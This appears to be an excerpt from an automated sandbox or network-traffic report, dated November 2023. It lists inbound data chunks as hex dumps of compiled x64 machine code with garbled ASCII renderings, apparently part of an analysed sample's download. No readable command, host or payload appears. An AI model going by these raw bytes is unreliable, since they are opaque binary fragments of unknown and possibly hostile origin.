2023-11-18 09:02:42 UTC	8879	IN	Data Raw: 33 c0 48 83 c4 38 c3 48 8b 44 24 60 4c 8b ca 4c 8b 51 70 49 8b d3 48 8b 49 68 48 89 44 24 28 44 89 44 24 20 41 b8 08 00 00 00 41 ff 52 10 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 01 48 8b fa 48 8b 58 28 33 c0 39 43 10 75 18 4c 8b 43 20 48 8d 53 18 48 8b 4b 08 e8 54 3d 00 00 c7 43 10 00 00 00 00 85 c0 75 14 48 8b 4b 18 48 89 0f b9 0b 01 00 00 48 83 7b 18 00 0f 4e c1 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc 48 8b 09 48 8b 49 28 e9 74 b1 ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 01 48 8b 48 18 8b 41 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 81 90 00 00 00 48 8b 40 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 Data Ascii: 3H8HD$`LLQpIHIhHD$(DD$ AARH8H\$WH HHHX(39CuLC HSHKT=CuHKHH{NH\$0H _HHI(tHHHAHH@H
2023-11-18 09:02:42 UTC	8883	IN	Data Raw: c3 48 c7 44 c5 28 00 00 00 00 85 ff 75 3d 4c 8b 44 24 40 8d 57 01 48 8b 4e 38 4d 85 c0 74 07 e8 24 75 0e 00 eb 1b 4c 8b 46 28 e8 a9 77 0e 00 4c 8b 46 30 ba 02 00 00 00 48 8b 4e 38 e8 97 77 0e 00 48 8b ce e8 bf 08 00 00 8b f8 48 8b 44 24 58 4c 8b b4 24 b0 00 00 00 49 89 84 24 a8 00 00 00 8b c7 48 83 c4 60 41 5f 41 5d 41 5c 5f 5e 5d 5b c3 0f 1f 00 be f7 02 00 a3 f7 02 00 f5 f6 02 00 09 f6 02 00 eb f5 02 00 d9 f7 02 00 00 01 05 05 05 05 05 05 05 05 05 02 05 05 05 05 02 03 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 04 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b fa 48 8b d9 48 85 c9 74 61 e8 b6 5e 0e 00 83 f8 01 75 57 0f b7 43 08 a8 24 74 0e Data Ascii: HD(u=LD$@WHN8Mt$uLF(wLF0HN8wHHD$XL$I$H`A_A]A\_^][H\$WH HHHta^uWC$t
2023-11-18 09:02:42 UTC	8887	IN	Data Raw: 8b 5b 30 4c 8b c5 33 d2 48 8b cf e8 c3 1e fd ff 48 8d 87 b8 00 00 00 48 89 47 10 48 8b 43 48 48 89 47 08 48 ff 43 28 48 8b 43 28 48 89 7b 48 48 89 47 18 41 8b c6 eb 05 b8 07 00 00 00 48 8b 5c 24 30 48 8b 6c 24 38 48 89 3e 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 cc cc cc cc cc cc cc cc 48 83 ec 28 48 8b 41 30 48 8b 40 48 48 85 c0 74 0e 48 39 08 74 54 48 8b 40 08 48 85 c0 75 f2 48 8b 41 28 48 89 5c 24 20 48 8b 58 08 48 8b cb e8 dc b7 00 00 48 3b 43 78 74 1c 48 8b 8b 80 00 00 00 48 85 c9 74 10 e8 c5 c0 00 00 48 c7 83 80 00 00 00 00 00 00 00 8b 43 34 c7 43 34 00 00 00 00 48 8b 5c 24 20 48 83 c4 28 c3 33 c0 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 55 56 57 41 54 41 55 41 57 48 83 ec 40 45 33 e4 48 8b e9 48 8b 49 18 48 8b da Data Ascii: [0L3HHHGHCHHGHC(HC(H{HHGAH\$0Hl$8H>Ht$@H\|$HH A^H(HA0H@HHtH9tTH@HuHA(H\$ HXHH;CxtHHtHC4C4H\$ H(3H(@SUVWATAUAWH@E3HHIH
2023-11-18 09:02:42 UTC	8890	IN	Data Raw: 72 f8 48 8b 75 c7 e8 6b 1b 06 00 85 c0 75 1d 48 8b d7 48 8b ce e8 8c b7 11 00 48 85 c0 74 0d 44 8b 45 cf 89 7d d3 48 89 45 c7 eb 12 44 8b 75 cf 41 c7 45 34 07 00 00 00 eb 1e 48 8b 45 c7 49 63 c8 48 03 c8 8b 05 f4 94 13 00 89 01 44 8b 75 cf 41 83 c6 04 44 89 75 cf 48 8b 75 c7 4c 8b 6d f7 66 0f 1f 44 00 00 41 3b de 0f 8d 58 02 00 00 48 63 c3 ff c3 0f b6 0c 30 84 c9 0f 89 82 00 00 00 ff cb 4c 63 cb 4c 03 ce 41 0f b6 09 84 c9 78 07 b8 01 00 00 00 eb 69 41 0f b6 51 01 84 d2 78 0f 83 e1 7f b8 02 00 00 00 c1 e1 07 0b ca eb 51 41 0f b6 41 02 c1 e1 0e 0b c8 8b c1 84 c9 78 16 25 7f c0 1f 00 8b ca 83 e1 7f c1 e1 07 0b c8 b8 03 00 00 00 eb 2b 45 0f b6 01 45 84 c0 78 0b 41 8b c8 b0 01 48 89 4d d7 eb 10 48 8d 55 d7 49 8b c9 e8 71 43 ff ff 48 8b 4d d7 0f ba f1 1f 0f b6 Data Ascii: rHukuHHHtDE}HEDuAE4HEIcHDuADuHuLmfDA;XHc0LcLAxiAQxQAAx%+EExAHMHUIqCHM
2023-11-18 09:02:42 UTC	8894	IN	Data Raw: 00 00 4d 8b f1 33 d2 4e 8d 04 cd 00 00 00 00 e8 dd 01 fd ff ba 01 00 00 00 49 8b cf e8 90 a8 00 00 41 83 7f 34 00 48 8b f8 75 72 83 78 08 00 74 6c 48 8b 08 44 0f b6 01 45 84 c0 78 0a 41 8b c0 48 89 03 b0 01 eb 08 48 8b d3 e8 92 33 ff ff 0f b6 d8 3b 5f 08 7d 46 48 89 6c 24 48 33 ed 0f 1f 00 49 3b ee 7d 32 48 63 cb 48 03 0f 44 0f b6 01 45 84 c0 78 0a 41 8b c0 48 89 06 b0 01 eb 08 48 8b d6 e8 5a 33 ff ff 0f b6 c0 48 ff c5 03 d8 48 83 c6 08 3b 5f 08 7c c9 48 8b 6c 24 48 4c 8b 74 24 20 48 8b 74 24 50 48 8b 5c 24 40 48 85 ff 74 5b 83 3d f9 36 16 00 00 74 49 48 8b 0d b0 6c 16 00 48 85 c9 74 06 ff 15 65 37 16 00 48 8b cf ff 15 14 37 16 00 48 ff 0d 5d 6d 16 00 48 63 c8 48 29 0d 0b 6d 16 00 48 8b cf ff 15 ea 36 16 00 48 8b 0d 7b 6c 16 00 48 85 c9 74 11 ff 15 40 37 Data Ascii: M3NIA4HurxtlHDExAHH3;_}FHl$H3I;}2HcHDExAHHZ3HH;_\|Hl$HLt$ Ht$PH\$@Ht[=6tIHlHte7H7H]mHcH)mH6H{lHt@7
2023-11-18 09:02:42 UTC	8899	IN	Data Raw: 8b cd e8 15 55 00 00 49 8b 44 24 58 c7 45 bf 01 00 00 00 0f b7 48 04 48 6b c9 78 4e 39 7c 21 70 0f 94 c0 41 88 44 24 14 4a 8b 84 21 c8 00 00 00 49 89 44 24 50 49 8b d4 49 8b cd e8 ec 6f 00 00 85 c0 0f 85 64 ff ff ff 49 8b d4 49 8b cd e8 49 40 00 00 85 c0 0f 84 f1 fd ff ff 48 8b 7d f7 8b 5d 9f 45 8b ef 4c 8b 65 4f 8b c3 48 c1 e0 04 4d 8b f7 4c 8b 7d c7 48 89 45 f7 49 8b c7 48 89 45 cf 83 3f 00 75 1b 4d 63 cd 48 8d 55 af 49 c1 e1 04 44 8b c3 4d 03 cf 49 8b cc ff 55 df 48 8b 45 cf 44 03 eb 49 63 f5 4c 3b f6 0f 8d 8e 00 00 00 48 8b d8 49 2b f6 66 0f 1f 44 00 00 48 8b 3b 48 85 ff 74 5b 83 3d 61 26 16 00 00 74 49 48 8b 0d 18 5c 16 00 48 85 c9 74 06 ff 15 cd 26 16 00 48 8b cf ff 15 7c 26 16 00 48 ff 0d c5 5c 16 00 48 8b cf 48 63 d0 48 29 15 70 5c 16 00 ff 15 52 Data Ascii: UID$XEHHkxN9\|!pAD$J!ID$PIIodIII@H}]ELeOHML}HEIHE?uMcHUIDMIUHEDIcL;HI+fDH;Ht[=a&tIH\Ht&H\|&H\HHcH)p\R
2023-11-18 09:02:42 UTC	8903	IN	Data Raw: e8 22 1a 01 00 85 c0 0f 85 b7 00 00 00 48 63 4b 08 41 bb 01 00 00 00 48 03 0b 48 83 ff 7f 77 0c 40 80 e7 7f 41 8b c3 40 88 39 eb 2b 48 81 ff ff 3f 00 00 77 1a 48 8b c7 48 c1 e8 07 0c 80 40 80 e7 7f 88 01 40 88 79 01 b8 02 00 00 00 eb 08 48 8b d7 e8 70 11 ff ff 01 43 08 8d 04 36 48 63 4b 08 48 03 0b 48 63 d0 48 83 fa 7f 77 07 80 e2 7f 88 11 eb 2a 48 81 fa ff 3f 00 00 77 19 48 8b c2 41 bb 02 00 00 00 48 c1 e8 07 0c 80 80 e2 7f 88 01 88 51 01 eb 08 e8 2c 11 ff ff 44 8b d8 44 01 5b 08 4c 8b c6 48 63 4b 08 48 03 0b 48 8b 55 08 e8 f2 d7 fc ff 01 73 08 48 63 43 08 48 03 03 33 c9 48 89 08 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 8b c2 48 83 c1 34 49 8b d1 e9 91 18 01 00 cc cc cc cc cc cc cc cc cc Data Ascii: "HcKAHHw@A@9+H?wHH@@yHpC6HcKHHcHw*H?wHAHQ,DD[LHcKHHUsHcCH3HH\$0Hl$8Ht$@H _LH4I
2023-11-18 09:02:42 UTC	8906	IN	Data Raw: 5f c3 48 89 3a eb e7 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 01 48 8b fa 48 8b d9 83 b8 88 00 00 00 00 7e 54 4c 8b 1a 4d 85 db 74 4c 48 63 49 10 33 d2 4d 8b 53 08 4d 63 c0 4b 8d 04 10 48 f7 f1 33 d2 4c 8b c8 49 8b c2 48 f7 f1 4b 8d 0c 10 48 8b d7 45 8b 43 14 44 2b c8 49 89 4b 08 48 8b 0b 44 0f af 43 10 45 0f af c1 44 8b 89 88 00 00 00 48 8b cb e8 20 00 00 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 57 41 54 41 56 41 57 48 83 ec 20 48 8b 3a 45 33 f6 44 89 44 24 60 45 8b e1 48 89 7c 24 58 4c 8b fa 48 8b e9 45 85 c0 0f 8e e0 00 00 00 48 89 5c 24 50 48 89 74 24 68 0f 1f 80 00 00 00 00 83 7d 34 00 0f 85 a8 00 00 00 44 8b 57 14 33 f6 33 db 45 33 c9 33 c9 45 33 Data Ascii: _H:H\$WH HHH~TLMtLHcI3MSMcKH3LIHKHECD+IKHDCEDH H\$0H _@UWATAVAWH H:E3DD$`EH\|$XLHEH\$PHt$h}4DW33E33E3
2023-11-18 09:02:42 UTC	8910	IN	Data Raw: 48 8b 01 48 8b f2 33 d2 41 8b d8 48 8b f9 48 8b ce 8b a8 84 00 00 00 44 8d 42 78 83 c5 14 e8 83 c2 fc ff 41 b8 01 00 00 00 89 1e 48 8b d6 48 8b cf e8 b0 0c 00 00 48 8d 56 20 c7 46 08 01 00 00 00 c6 46 4a 01 c7 46 70 01 00 00 00 39 6a 0c 73 0c 48 8d 4f 34 44 8b c5 e8 89 fb 00 00 39 6e 1c 73 10 48 8d 4f 34 44 8b c5 48 8d 56 10 e8 74 fb 00 00 48 83 7f 50 00 75 26 48 8b 17 48 8d 0d eb 43 13 00 4c 8b 42 10 48 8b 52 08 e8 c6 3a 11 00 4c 8b c0 48 8d 57 50 48 8b cf e8 07 68 00 00 83 7f 34 00 75 1e 48 8b 46 10 33 c9 89 08 8d 51 01 4c 63 06 c7 46 18 04 00 00 00 48 8b 4f 50 e8 63 0a 0e 00 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 83 79 34 00 48 8b da 48 89 6c 24 30 48 89 74 24 38 49 8b Data Ascii: HH3AHHDBxAHHHV FFJFp9jsHO4D9nsHO4DHVtHPu&HHCLBHR:LHWPHh4uHF3QLcFHOPcH\$0Hl$8Ht$@H\|$HH A^@SH y4HHl$0Ht$8I
2023-11-18 09:02:42 UTC	8916	IN	Data Raw: 89 42 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 57 48 83 ec 30 48 8b 42 68 48 8b f9 4c 8b 51 30 48 89 01 4c 8b 4a 10 48 8b 4a 20 4c 63 42 70 4c 03 c1 49 63 41 0c 4c 3b c0 7f 2c 4d 8b 01 4c 03 c1 c7 47 28 00 00 00 00 48 8b 4f 18 44 8b 4a 70 48 83 c1 34 49 8b d2 48 89 7c 24 20 e8 be 02 00 00 48 83 c4 30 5f c3 48 8b 4f 18 4c 8d 4f 20 4d 8b c2 48 89 5c 24 40 c7 47 28 00 00 00 00 e8 0c 04 00 00 48 8b 47 20 48 8b 5c 24 40 48 89 47 08 8b 47 28 89 47 10 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f2 48 8b f9 48 63 4a 70 48 8b 52 20 4c 8b 4e 10 4c 8d 04 0a 49 63 41 0c 4c 3b c0 7e 40 48 8b 4f 18 4c 8d 4f 20 45 33 c0 48 8b d6 44 89 47 28 4c 8b 47 30 e8 97 03 00 00 Data Ascii: B8@WH0HBhHLQ0HLJHJ LcBpLIcAL;,MLG(HODJpH4IH\|$ H0_HOLO MH\$@G(HG H\$@HGG(GH0_H\$Ht$WH HHHcJpHR LNLIcAL;~@HOLO E3HDG(LG0
2023-11-18 09:02:42 UTC	8922	IN	Data Raw: 40 4c 8b f1 4c 8b 41 58 48 63 da 99 2b c2 d1 f8 4d 8d 3c 98 3b d8 7c 09 2b d8 03 db 8d 7b 01 eb 16 8d 0c 1b 48 63 c1 41 0f b7 1c 80 8d 41 01 48 63 c8 41 0f b7 3c 88 48 63 c3 48 6b e8 78 48 63 c7 48 6b f0 78 49 03 ee 41 c6 47 02 00 49 03 f6 48 83 7d 70 00 0f 84 9e 00 00 00 48 83 7e 70 00 75 07 8b fb e9 90 00 00 00 8b 86 c0 00 00 00 4c 89 6c 24 40 44 8b ad c0 00 00 00 44 3b e8 41 0f 4c c5 85 c0 7e 1c 48 8b 96 b8 00 00 00 48 8b 8d b8 00 00 00 4c 63 c0 e8 fa f7 fd ff 8b c8 85 c0 75 09 41 8b cd 2b 8e c0 00 00 00 4c 8b 6c 24 40 85 c9 75 42 41 c6 47 02 01 48 8b 8d c8 00 00 00 48 8b 96 c8 00 00 00 48 3b ca 75 11 0f b6 8e d4 00 00 00 8b c7 88 8d d4 00 00 00 eb 22 33 c0 48 3b ca b9 01 00 00 00 0f 9f c0 83 ca ff 41 3b 46 44 0f 44 ca 85 c9 0f 48 fb 66 41 89 3f 33 c0 Data Ascii: @LLAXHc+M<;\|+{HcAAHcA<HcHkxHcHkxIAGIH}pH~puLl$@DD;AL~HHLcuA+Ll$@uBAGHHH;u"3H;A;FDDHfA?3
2023-11-18 09:02:42 UTC	8933	IN	Data Raw: 80 e7 7f 88 01 40 88 79 01 b8 02 00 00 00 eb 08 48 8b d7 e8 ee 98 fe ff 03 f0 41 ff c4 49 83 c7 0c 45 3b 65 1c 0f 8c fb fd ff ff 4c 8b bc 24 80 00 00 00 8b 94 24 90 00 00 00 41 bc 00 00 00 00 48 8b 84 24 98 00 00 00 ff c2 4c 8b ac 24 88 00 00 00 48 ff c0 89 94 24 90 00 00 00 48 89 84 24 98 00 00 00 41 3b 55 14 0f 8c 58 fc ff ff 44 8b ce 4d 8b c6 ba 0a 00 00 00 49 8b cf e8 75 0c 00 00 4c 8b 7c 24 38 4c 8b 6c 24 40 4c 8b 64 24 48 48 8b 7c 24 50 48 8b 74 24 58 48 8b 6c 24 60 48 8b 5c 24 68 4d 85 f6 74 67 83 3d 36 9d 15 00 00 74 4e 48 8b 0d ed d2 15 00 48 85 c9 74 06 ff 15 a2 9d 15 00 49 8b ce ff 15 51 9d 15 00 48 ff 0d 9a d3 15 00 49 8b ce 48 63 d0 48 29 15 45 d3 15 00 ff 15 27 9d 15 00 48 8b 0d b8 d2 15 00 48 85 c9 74 1d 48 83 c4 70 41 5e 48 ff 25 76 9d 15 Data Ascii: @yHAIE;eL$$AH$L$H$H$A;UXDMIuL\|$8Ll$@Ld$HH\|$PHt$XHl$`H\$hMtg=6tNHHtIQHIHcH)E'HHtHpA^H%v
2023-11-18 09:02:42 UTC	8936	IN	Data Raw: 74 18 ff 15 1e 93 15 00 eb 09 48 8b cb ff 15 ab 92 15 00 48 8b 0d 3c c8 15 00 ff c6 49 83 c6 10 3b 77 14 7c 92 4c 8b 74 24 40 48 8b 5c 24 30 48 8b cf e8 bf 04 11 00 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 8d 42 01 48 63 f2 4c 63 c0 48 8b d6 49 c1 e0 25 48 8b d9 49 ff c8 48 c1 e2 25 e8 72 00 00 00 48 83 7b 58 00 75 26 48 8b 13 48 8d 0d 69 dd 12 00 4c 8b 42 10 48 8b 52 08 e8 e4 d4 10 00 4c 8b c0 48 8d 53 58 48 8b cb e8 25 02 00 00 83 7b 34 00 75 26 48 8b 4b 58 4c 8b c6 ba 01 00 00 00 e8 8e a4 0d 00 48 8b 4b 58 e8 f5 b5 0d 00 48 8b 4b 58 e8 0c c8 0d 00 89 43 34 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc 48 89 6c 24 10 48 89 74 24 Data Ascii: tHH<I;w\|Lt$@H\$0HHt$8H _H\$Ht$WH BHcLcHI%HIH%rH{Xu&HHiLBHRLHSXH%{4u&HKXLHKXHKXC4H\$0Ht$8H _Hl$Ht$
2023-11-18 09:02:42 UTC	8952	IN	Data Raw: 89 42 18 33 c0 41 39 40 10 0f 94 c0 89 42 08 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 41 55 48 83 ec 40 48 8b 42 20 4c 8b ea 48 89 5c 24 58 4c 8b d9 48 89 7c 24 38 33 db 4c 89 64 24 30 44 8b d3 48 8b 78 18 45 8b e0 48 83 c7 20 89 5a 08 4c 89 7c 24 20 4d 8b f9 48 39 5f 18 0f 84 e4 00 00 00 44 8b 49 18 44 8b c3 48 89 6c 24 60 48 8b cf 48 89 74 24 68 8d 6b 01 4c 89 74 24 28 44 8b f3 0f 1f 84 00 00 00 00 00 48 8b 41 10 38 58 14 75 1b 48 8b 10 45 85 c0 74 0d 49 3b d6 8b c3 0f 9c c0 44 3b c8 74 06 4c 8b f2 44 8b c5 48 8b 49 18 48 85 c9 75 d3 0f 1f 00 48 8b 77 10 38 5e 14 75 61 48 8b 0e 49 3b ce 74 19 45 85 e4 74 10 49 3b cf 74 0b 8b c3 0f 9f c0 41 3b 43 18 74 04 8b eb eb 40 48 8b 4e 18 48 8b d6 45 85 e4 74 0a 4d 8b c7 Data Ascii: B3A9@B3HL$AUH@HB LH\$XLH\|$83Ld$0DHxEH ZL\|$ MH9_DIDHl$`HHt$hkLt$(DHA8XuHEtI;D;tLDHIHuHw8^uaHI;tEtI;tA;Ct@HNHEtM
2023-11-18 09:02:42 UTC	8968	IN	Data Raw: e8 61 13 00 00 44 8b 7c 24 30 49 89 45 48 41 8b c7 e9 65 04 00 00 41 c7 45 40 01 00 00 00 41 8b c7 e9 55 04 00 00 48 ff c7 44 38 34 3b 75 f7 48 ff c7 48 8d 34 fd 00 00 00 00 e8 97 e5 04 00 85 c0 74 05 4d 8b e6 eb 1a 48 85 f6 74 0d 48 8b ce e8 71 86 10 00 4c 8b e0 eb 03 4d 8b e6 4d 85 e4 75 0d 48 85 f6 7e 15 41 bf 07 00 00 00 eb 0d 4c 8b c6 33 d2 49 8b cc e8 5a dc fb ff 48 03 ff 49 8b ee 45 85 ff 75 38 e8 4a e5 04 00 85 c0 75 15 48 85 ff 74 0b 48 8b cf e8 29 86 10 00 48 8b e8 48 85 ed 75 0d 48 85 ff 7e 15 41 bf 07 00 00 00 eb 0d 4c 8b c7 33 d2 48 8b cd e8 17 dc fb ff 48 8b f5 4d 85 e4 0f 84 cf 00 00 00 48 85 ed 0f 84 c6 00 00 00 4d 39 75 68 74 0c 48 8d 0d fd 58 12 00 e9 a1 00 00 00 48 85 db 0f 84 91 00 00 00 49 bf 21 00 00 00 00 00 00 42 0f b6 03 84 c0 0f Data Ascii: aD\|$0IEHAeAE@AUHD84;uHH4tMHtHqLMMuH~AL3IZHIEu8JuHtH)HHuH~AL3HHMHM9uhtHXHI!B
2023-11-18 09:02:42 UTC	8972	IN	Data Raw: 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc c7 41 08 00 00 00 00 c3 cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 48 8b 09 e8 af 71 10 00 33 c0 48 89 03 48 89 43 08 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 4c 89 44 24 18 4c 89 4c 24 20 53 48 83 ec 20 83 39 00 48 8b c2 48 8b d9 75 1e 48 8d 54 24 40 48 8b c8 e8 44 42 10 00 48 85 c0 75 0e c7 03 07 00 00 00 48 83 c4 20 5b c3 33 c0 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc 4c 89 44 24 18 4c 89 4c 24 20 53 56 48 83 ec 28 83 39 00 48 8b f2 48 8b d9 75 47 48 8d 54 24 58 48 89 7c 24 20 49 8b c8 e8 f3 41 10 00 48 8b f8 48 85 c0 75 12 c7 03 07 00 00 00 48 8b 7c 24 20 48 83 c4 28 5e 5b c3 4c 8b c7 48 8b d6 48 8b cb e8 1b 00 00 00 48 8b cf e8 Data Ascii: H _A@SH HHq3HHCH [HT$LD$LL$ SH 9HHuHT$@HDBHuH [3H [LD$LL$ SVH(9HHuGHT$XH\|$ IAHHuH\|$ H(^[LHHH
2023-11-18 09:02:42 UTC	8984	IN	Data Raw: 00 00 33 c0 48 8b 5c 24 30 48 83 c4 20 5f c3 b8 07 00 00 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc 40 53 48 83 ec 20 83 79 28 00 48 8b d9 75 16 48 8b 41 08 48 85 c0 74 0d 48 8b 09 ff d0 48 c7 43 08 00 00 00 00 48 8b 4b 20 e8 52 44 10 00 48 8b 4b 10 e8 49 44 10 00 48 8b cb 48 83 c4 20 5b e9 3c 44 10 00 cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b 41 20 48 8b d9 83 78 28 00 74 0b b8 01 00 00 00 48 83 c4 20 5b c3 48 8b 40 10 48 8b 49 18 48 89 74 24 30 ff 90 b0 00 00 00 8b f0 85 c0 0f 84 86 00 00 00 48 89 7c 24 38 48 8b 7b 10 48 85 ff 74 5b 83 3d 80 d1 14 00 00 74 49 48 8b 0d 37 07 15 00 48 85 c9 74 06 ff 15 ec d1 14 00 48 8b cf ff 15 9b d1 14 00 48 ff 0d e4 07 15 00 48 8b cf 48 63 d0 48 29 15 8f 07 15 00 ff 15 71 d1 14 00 48 8b Data Ascii: 3H\$0H _H\$0H _@SH y(HuHAHtHHCHK RDHKIDHH [<D@SH HA Hx(tH [H@HIHt$0H\|$8H{Ht[=tIH7HtHHHHcH)qH
2023-11-18 09:02:42 UTC	8995	IN	Data Raw: f6 44 88 74 24 20 e8 1b 7f 09 00 48 85 c0 74 0a 44 38 73 02 74 04 83 48 04 20 ff c6 48 83 c3 18 83 fe 2a 0f 82 5d ff ff ff 41 8b f6 48 8d 1d db ac 12 00 0f 1f 00 0f b6 4b f1 49 8b d6 83 e9 01 74 0b 83 f9 01 75 09 48 83 ca ff eb 03 48 8b d7 48 8b 03 41 b9 01 00 00 00 44 0f be 43 f0 48 8b cf 4c 89 74 24 50 4c 89 74 24 48 4c 89 74 24 40 48 89 44 24 38 48 8b 43 f8 48 89 44 24 30 4c 89 74 24 28 48 89 54 24 20 48 8b 53 e8 e8 85 50 04 00 ff c6 48 83 c3 20 83 fe 06 72 9a 4c 8d 5c 24 60 33 c0 49 8b 5b 10 49 8b 6b 18 49 8b 73 20 49 8b 7b 28 49 8b e3 41 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b 01 48 8b d9 48 8b 48 28 e8 6b 68 04 00 48 63 c8 ba 00 24 00 00 48 8b 03 66 85 50 08 74 10 48 8b d1 48 8b c8 48 83 c4 20 5b e9 fa 6d 0d 00 48 89 08 Data Ascii: Dt$ HtD8stH H*]AHKItuHHHADCHLt$PLt$HLt$@HD$8HCHD$0Lt$(HT$ HSPH rL\$`3I[IkIs I{(IA^@SH HHHH(khHc$HfPtHHH [mH
2023-11-18 09:02:42 UTC	9011	IN	Data Raw: 8d 15 c0 67 12 00 49 8b 08 0f b7 41 08 83 e0 3f 80 3c 10 05 0f 84 b0 00 00 00 0f b7 41 08 0f 29 74 24 30 a8 08 74 06 f2 0f 10 31 eb 1f a8 24 74 0a 0f 57 f6 f2 48 0f 2a 31 eb 11 a8 12 74 0a e8 12 34 0d 00 0f 28 f0 eb 03 0f 57 f6 e8 4d 81 fb ff c7 00 00 00 00 00 e8 42 81 fb ff 83 38 00 75 1d 0f 28 c6 e8 51 37 fb ff 48 8b 0f 0f 28 c8 0f 28 74 24 30 48 83 c4 40 5f e9 78 2d 0d 00 48 89 5c 24 50 e8 16 81 fb ff 48 63 18 e8 0e 81 fb ff 8b 08 e8 c7 ba fb ff b9 01 00 00 00 48 c7 44 24 20 ff ff ff ff 89 4f 24 44 0f b6 c9 48 8b 0f 4c 8b c3 48 8b d0 e8 6c 28 0d 00 48 8b 5c 24 50 0f 28 74 24 30 48 83 c4 40 5f c3 48 8b 07 b9 00 24 00 00 66 85 48 08 74 0d 48 8b c8 48 83 c4 40 5f e9 71 35 0d 00 b9 01 00 00 00 66 89 48 08 48 83 c4 40 5f c3 cc cc cc cc cc cc cc cc cc cc cc Data Ascii: gIA?<A)t$0t1$tWH*1t4(WMB8u(Q7H((t$0H@_x-H\$PHcHD$ O$DHLHl(H\$P(t$0H@_H$fHtHH@_q5fHH@_
2023-11-18 09:02:42 UTC	9012	IN	Data Raw: 8b c3 48 8b d0 e8 3c 25 0d 00 48 8b 5c 24 50 0f 28 74 24 30 48 83 c4 40 5f c3 48 8b 07 b9 00 24 00 00 66 85 48 08 74 0d 48 8b c8 48 83 c4 40 5f e9 41 32 0d 00 b9 01 00 00 00 66 89 48 08 48 83 c4 40 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 0f b6 11 4c 8d 15 d6 01 fb ff 4c 8d 49 01 42 0f b6 8c 12 20 0a 17 00 44 8b c1 41 83 e8 01 74 2d 41 83 e8 01 74 1b 41 83 e8 01 74 09 41 83 f8 01 74 5a 8b c2 c3 41 0f b6 01 c1 e2 06 03 d0 49 ff c1 41 0f b6 01 c1 e2 06 03 d0 49 ff c1 41 0f b6 01 48 8d 0c 8d 00 00 00 00 c1 e2 06 42 2b 94 11 88 ea 16 00 03 d0 42 85 94 11 28 33 17 00 74 1c 8b c2 25 00 f8 ff ff 3d 00 d8 00 00 74 0e 8b c2 83 e0 fe 3d fe ff 00 00 8b c2 75 05 b8 fd ff 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec Data Ascii: H<%H\$P(t$0H@_H$fHtHH@_A2fHH@_LLIB DAt-AtAtAtZAIAIAHB+B(3t%=t=uH\$WH
2023-11-18 09:02:42 UTC	9023	IN	Data Raw: c1 e8 10 45 8b 9c 8c 10 2f 17 00 0f b6 c8 41 8b 84 8c 20 5d 17 00 4c 33 d8 48 8b c3 48 c1 e8 18 41 8b 84 84 00 ff 16 00 4c 33 d8 0f b6 c2 41 8b 84 84 40 04 17 00 4c 33 d8 41 8b 86 b4 00 00 00 4c 33 d8 48 8b c2 48 c1 e8 10 0f b6 c8 48 8b c3 48 c1 e8 08 48 c1 eb 10 48 c1 ea 18 45 8b 8c 8c 20 5d 17 00 0f b6 c8 41 8b 84 8c 10 2f 17 00 4c 33 c8 49 8b c2 48 c1 e8 18 41 8b 84 84 00 ff 16 00 4c 33 c8 40 0f b6 c6 48 c1 ee 08 41 8b 84 84 40 04 17 00 4c 33 c8 41 8b 86 bc 00 00 00 4c 33 c8 0f b6 c3 45 8b 84 84 20 5d 17 00 40 0f b6 c6 41 8b 84 84 10 2f 17 00 4c 33 c0 41 8b 84 94 00 ff 16 00 4c 33 c0 41 0f b6 c2 41 8b 84 84 40 04 17 00 4c 33 c0 41 8b 86 b0 00 00 00 4c 33 c0 49 8b c0 48 c1 e8 08 0f b6 c8 49 8b c1 48 c1 e8 10 41 8b b4 8c 10 2f 17 00 0f b6 c8 41 8b 84 8c Data Ascii: E/A ]L3HHAL3A@L3AL3HHHHHHE ]A/L3IHAL3@HA@L3AL3E 